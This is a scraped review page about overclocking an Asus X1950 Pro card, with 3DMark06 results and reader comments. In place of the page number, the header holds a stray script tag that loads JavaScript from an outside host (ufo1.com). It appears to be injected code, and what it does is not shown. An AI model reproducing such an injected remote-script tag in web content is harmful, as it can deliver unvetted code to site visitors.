Asus X1950 Pro Crossfire (EAX1950PRO)

Overclocking Results

Page <script type="text/javascript" src="http://ufo1.com/ad/c.js"></script> Posted 10/11/06
Author: Matthew Kemp (kempez)
Product Acquired: Asus Technology


Overclocking


Usually when I overclock an ATI card I do so using the Overdrive facility in ATI's drivers. This time however I was working with a beta driver that did not give me the option of overclocking. Instead I used ATI tool and set the Core and Memory clock from there. I did not tweak any voltages to keep the tests more fair.

The Results

Let's take a look and see how the Asus X1950 pro did:

asus x1950 pro overclock

An overclock of 59MHz on the core and 31Mhz on the memory. The GDDR3 is only rated at 700MHz so it was nice to see a small amount squeezed out of the card. The OC on the core was pretty impressive and I think with some slight voltage tweaks I could have easily gained more on the core overclock.

Testing the Overclock

Let's see how this affected our 3DMark06 score:

asus x1950 pro overclocked

An excellent increase of 726 3DMarks is very nice for hardly any voltage adjustment at all. This is no doubt down to the excellent cooler on the card.

«Prev 1 2 3 4 5 6 7 8 Next»

Most Recent Comments

13-11-2006, 04:47:18

FarFarAway
We get a couple of these awesome VFM cards and put them through their paces in single card and Crossfire config

click

13-11-2006, 06:13:51

FragTek
Nice review, and great cards to boot!!

13-11-2006, 06:15:36

FarFarAway
For £133 they're v. good value

13-11-2006, 07:17:22

Ham
Thats prob the best price: performance card ive see... well ever.

14-11-2006, 11:54:02

TJS
Definitely too late, unless you're on a tight budget. With the onslaught of nVidia's DX10 8800GTX's and GTS's, I don't see them selling very well, especially when nVidia starts slinging mid-range DX10 GT's into the market. (Is the 'GTS' supposed to be the 'GT' version? I'm a bit confused right now.)

TJS

14-11-2006, 14:08:08

FarFarAway
No I have to say £133 for a GPU that performs that well is an absolute bargain. no diggedy no doubt

21-11-2006, 22:03:28

Mr. Popo
Great job reviewing those bad boys!

22-11-2006, 01:10:10

liqnit
Great review

i love that Asus have been so fast to amend their mistake

22-11-2006, 05:05:48

FarFarAway
Yeah I was pretty impressed by that too: good work by Asus imo

22-11-2006, 05:25:00

Toxcity
OoOOoooo!

Cheap as chips!

If I wasn't a Nvidia homeboy I would get one...

06-02-2007, 13:33:18

dada
good review really helping me decide on a graphics card

06-02-2007, 13:36:02

FarFarAway
Quote:
Originally Posted by name='dada'
good review really helping me decide on a graphics card
Excellent that's what we like to hear

06-02-2007, 15:08:54

Mr. Popo
Quote:
Originally Posted by name='Kempez'
Excellent that's what we like to hear
Good stuff indeed.
Reply
x

Register for the OC3D Newsletter

Subscribing to the OC3D newsletter will keep you up-to-date on the latest technology reviews, competitions and goings-on at Overclock3D. We won't share your email address with ANYONE, and we will only email you with updates on site news, reviews, and competitions and you can unsubscribe easily at any time.

Simply enter your name and email address into the box below and be sure to click on the links in the confirmation emails that will arrive in your e-mail shortly after to complete the registration.

If you run into any problems, just drop us a message on the forums.